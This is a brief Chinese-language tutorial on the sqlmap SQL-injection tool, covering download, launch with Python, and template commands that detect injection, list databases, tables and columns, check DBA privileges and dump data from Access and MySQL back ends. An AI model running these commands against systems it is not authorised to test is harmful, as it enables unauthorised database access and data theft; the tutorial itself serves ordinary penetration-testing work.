sqlmap工具的介紹
sqlmap 是一個開源滲透測試工具,它可以自動檢測和利用 SQL 注入漏洞并接管資料庫伺服器。它具有強大的檢測引擎,同時有衆多功能,包括資料庫指紋識别、從資料庫中擷取資料、通路底層檔案系統以及在作業系統上帶内連接配接執行指令。
sqlmap工具下載下傳
官方網站下載下傳http://sqlmap.org/
sqlmap工具啟動
1,需要在啟動電腦上安裝python環境
2,在安裝目錄下,啟動cmd視窗,然後調用python運作
sqlmap工具使用
一。注入access資料庫常用的參數sqlmap.py -u "url" //判斷參數是否存在注入
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段資料
二。注入MySQL資料庫常用參數sqlmap.py -u "url" //判斷參數是否存在注入
sqlmap.py -u "url" --current-db //檢視網站目前資料庫
sqlmap.py -u "url" --is-dba //檢視目前使用者權限
sqlmap.py -u "url" --tables //猜解表名
sqlmap.py -u "url" --columns -T "要猜解的表名" //猜解列名
sqlmap.py -u "url" --dump -C "列名" -T “表名” //爆出字段資料
![sqlmap使用_使用sqlmap對路由器管理系統進行sql注入檢測[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)